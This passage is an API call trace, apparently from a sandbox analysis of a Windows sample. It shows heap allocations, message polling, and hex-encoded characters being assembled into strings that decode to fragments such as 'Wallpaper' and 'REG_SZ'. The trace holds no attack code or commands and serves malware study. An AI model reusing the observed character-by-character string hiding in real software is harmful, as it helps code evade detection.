| out: hHeap=0x2af0000) returned 1 [0083.618] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f2760 [0083.618] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a6a7c8 [0083.618] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6a7c8 | out: hHeap=0x2af0000) returned 1 [0083.618] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f2958 [0083.618] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a6a7c8 [0083.618] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f26e8 [0083.620] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f2910 | out: hHeap=0x2af0000) returned 1 [0083.620] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f2940 | out: hHeap=0x2af0000) returned 1 [0083.620] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f2928 | out: hHeap=0x2af0000) returned 1 [0083.620] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f2760 | out: hHeap=0x2af0000) returned 1 [0083.620] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f2778 | out: hHeap=0x2af0000) returned 1 [0083.620] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6a908 | out: hHeap=0x2af0000) returned 1 [0083.620] lstrlenW (lpString="73") returned 2 [0083.620] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f2958 | out: hHeap=0x2af0000) returned 1 [0083.620] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6a7c8 | out: hHeap=0x2af0000) returned 1 [0083.620] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f26e8 | out: hHeap=0x2af0000) returned 1 [0083.620] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f26d0 | out: hHeap=0x2af0000) returned 1 [0083.620] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f2790 | out: hHeap=0x2af0000) returned 1 [0083.620] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6a8e8 | out: hHeap=0x2af0000) returned 1 [0083.620] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f28f8 [0083.620] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f28b0 [0083.620] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a6a7c8 [0083.620] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f2748 | out: hHeap=0x2af0000) returned 1 [0083.620] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f2898 | out: hHeap=0x2af0000) returned 1 [0083.620] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6a8a8 | out: hHeap=0x2af0000) returned 1 [0083.620] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f28b0 | out: hHeap=0x2af0000) returned 1 [0083.620] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6a7c8 | out: hHeap=0x2af0000) returned 1 [0083.620] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f28f8 | out: hHeap=0x2af0000) returned 1 [0083.620] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0083.620] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0083.620] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a6a7c8 [0083.620] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f2808 [0083.620] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f28e0 [0083.620] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a6a848 [0083.620] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f2700 [0083.620] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f2838 [0083.620] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a6a858 [0083.620] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f2748 [0083.620] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f2928 [0083.620] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a6a8a8 [0083.620] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f2970 [0083.621] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6a8a8 | out: hHeap=0x2af0000) returned 1 [0083.621] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f2760 [0083.621] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a6a8a8 [0083.621] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6a8a8 | out: hHeap=0x2af0000) returned 1 [0083.621] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f2820 [0083.621] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a6a8a8 [0083.621] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6a8a8 | out: hHeap=0x2af0000) returned 1 [0083.621] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f29a0 [0083.621] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a6a8a8 [0083.621] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f2778 [0083.621] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f2970 | out: hHeap=0x2af0000) returned 1 [0083.621] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f2928 | out: hHeap=0x2af0000) returned 1 [0083.621] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f2760 | out: hHeap=0x2af0000) returned 1 [0083.621] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f2820 | out: hHeap=0x2af0000) returned 1 [0083.621] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f2748 | out: hHeap=0x2af0000) returned 1 [0083.621] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6a858 | out: hHeap=0x2af0000) returned 1 [0083.621] lstrlenW (lpString="6B") returned 2 [0083.621] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f29a0 | out: hHeap=0x2af0000) returned 1 [0083.621] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6a8a8 | out: hHeap=0x2af0000) returned 1 [0083.621] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f2778 | out: hHeap=0x2af0000) returned 1 [0083.621] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f2838 | out: hHeap=0x2af0000) returned 1 [0083.621] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f2700 | out: hHeap=0x2af0000) returned 1 [0083.621] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6a848 | out: hHeap=0x2af0000) returned 1 [0083.621] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f2868 [0083.621] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f2838 [0083.621] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a6a8e8 [0083.621] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f28e0 | out: hHeap=0x2af0000) returned 1 [0083.621] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f2808 | out: hHeap=0x2af0000) returned 1 [0083.621] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6a7c8 | out: hHeap=0x2af0000) returned 1 [0083.621] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f2838 | out: hHeap=0x2af0000) returned 1 [0083.621] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6a8e8 | out: hHeap=0x2af0000) returned 1 [0083.621] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f2868 | out: hHeap=0x2af0000) returned 1 [0083.621] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0083.621] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0083.621] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a6a7c8 [0083.622] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f2760 [0083.622] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f2778 [0083.622] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a6a8a8 [0083.622] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f2850 [0083.622] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f2868 [0083.622] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a6a8e8 [0083.622] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f2790 [0083.622] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f2940 [0083.622] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a6a908 [0083.622] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f2880 [0083.622] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6a908 | out: hHeap=0x2af0000) returned 1 [0083.622] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f2928 [0083.622] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a6a848 [0083.622] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6a848 | out: hHeap=0x2af0000) returned 1 [0083.622] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f28b0 [0083.622] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a6a908 [0083.622] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6a908 | out: hHeap=0x2af0000) returned 1 [0083.622] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f27c0 [0083.622] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a6a848 [0083.622] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f28e0 [0083.622] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f2880 | out: hHeap=0x2af0000) returned 1 [0083.622] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f2940 | out: hHeap=0x2af0000) returned 1 [0083.622] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f2928 | out: hHeap=0x2af0000) returned 1 [0083.622] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f28b0 | out: hHeap=0x2af0000) returned 1 [0083.622] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f2790 | out: hHeap=0x2af0000) returned 1 [0083.622] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6a8e8 | out: hHeap=0x2af0000) returned 1 [0083.622] lstrlenW (lpString="74") returned 2 [0083.622] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f27c0 | out: hHeap=0x2af0000) returned 1 [0083.622] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6a848 | out: hHeap=0x2af0000) returned 1 [0083.622] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f28e0 | out: hHeap=0x2af0000) returned 1 [0083.622] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f2868 | out: hHeap=0x2af0000) returned 1 [0083.622] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f2850 | out: hHeap=0x2af0000) returned 1 [0083.623] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6a8a8 | out: hHeap=0x2af0000) returned 1 [0083.623] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f2928 [0083.623] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f28b0 [0083.623] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a6a848 [0083.623] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f2778 | out: hHeap=0x2af0000) returned 1 [0083.623] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f2760 | out: hHeap=0x2af0000) returned 1 [0083.623] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6a7c8 | out: hHeap=0x2af0000) returned 1 [0083.623] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x29f3b20 [0083.623] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6ce68 | out: hHeap=0x2af0000) returned 1 [0083.623] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f28b0 | out: hHeap=0x2af0000) returned 1 [0083.623] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6a848 | out: hHeap=0x2af0000) returned 1 [0083.623] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f2928 | out: hHeap=0x2af0000) returned 1 [0083.623] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0083.623] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0083.623] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a6a7c8 [0083.623] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f2958 [0083.623] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f2718 [0083.623] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a6a8a8 [0083.623] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f2748 [0083.623] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f2760 [0083.623] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a6a908 [0083.623] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f2808 [0083.623] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f2838 [0083.623] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a6a8e8 [0083.623] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f2778 [0083.623] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6a8e8 | out: hHeap=0x2af0000) returned 1 [0083.623] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f26e8 [0083.623] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a6a848 [0083.623] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6a848 | out: hHeap=0x2af0000) returned 1 [0083.623] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f27a8 [0083.623] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a6a8e8 [0083.623] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6a8e8 | out: hHeap=0x2af0000) returned 1 [0083.623] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f2898 [0083.624] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a6a848 [0083.624] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f2778 | out: hHeap=0x2af0000) returned 1 [0083.624] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f2838 | out: hHeap=0x2af0000) returned 1 [0083.624] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f26e8 | out: hHeap=0x2af0000) returned 1 [0083.624] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f27a8 | out: hHeap=0x2af0000) returned 1 [0083.624] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f2808 | out: hHeap=0x2af0000) returned 1 [0083.624] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6a908 | out: hHeap=0x2af0000) returned 1 [0083.624] lstrlenW (lpString="6F") returned 2 [0083.624] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f2898 | out: hHeap=0x2af0000) returned 1 [0083.624] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6a848 | out: hHeap=0x2af0000) returned 1 [0083.624] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f27c0 | out: hHeap=0x2af0000) returned 1 [0083.624] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f2760 | out: hHeap=0x2af0000) returned 1 [0083.624] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f2748 | out: hHeap=0x2af0000) returned 1 [0083.624] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6a8a8 | out: hHeap=0x2af0000) returned 1 [0083.624] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f2718 | out: hHeap=0x2af0000) returned 1 [0083.624] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f2958 | out: hHeap=0x2af0000) returned 1 [0083.624] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0083.624] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0083.624] lstrlenW (lpString="70") returned 2 [0083.624] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0083.624] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0083.624] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0083.624] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0083.624] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0083.624] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0083.624] lstrlenW (lpString="57") returned 2 [0083.625] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0083.625] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0083.625] lstrlenW (lpString="61") returned 2 [0083.625] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0083.625] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0083.625] lstrlenW (lpString="6C") returned 2 [0083.625] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0083.625] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0083.625] lstrlenW (lpString="6C") returned 2 [0083.625] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0083.625] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0083.625] lstrlenW (lpString="70") returned 2 [0083.625] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0083.625] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0083.625] lstrlenW (lpString="61") returned 2 [0083.625] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0083.625] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0083.625] lstrlenW (lpString="70") returned 2 [0083.625] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0083.625] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0083.625] lstrlenW (lpString="65") returned 2 [0083.625] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0083.625] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0083.625] lstrlenW (lpString="72") returned 2 [0083.625] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0083.625] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0083.625] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0083.625] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0083.626] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0083.626] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0083.626] lstrlenW (lpString="52") returned 2 [0083.626] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0083.626] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0083.626] lstrlenW (lpString="45") returned 2 [0083.626] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0083.626] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0083.626] lstrlenW (lpString="47") returned 2 [0083.626] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0083.626] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0083.626] lstrlenW (lpString="5F") returned 2 [0083.626] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0083.626] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0083.626] lstrlenW (lpString="53") returned 2 [0083.626] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0083.626] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0083.626] lstrlenW (lpString="5A") returned 2 [0083.626] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0083.626] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0083.626] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0083.626] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0083.626] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0083.626] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0083.626] lstrlenW (lpString="20") returned 2 [0083.626] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, 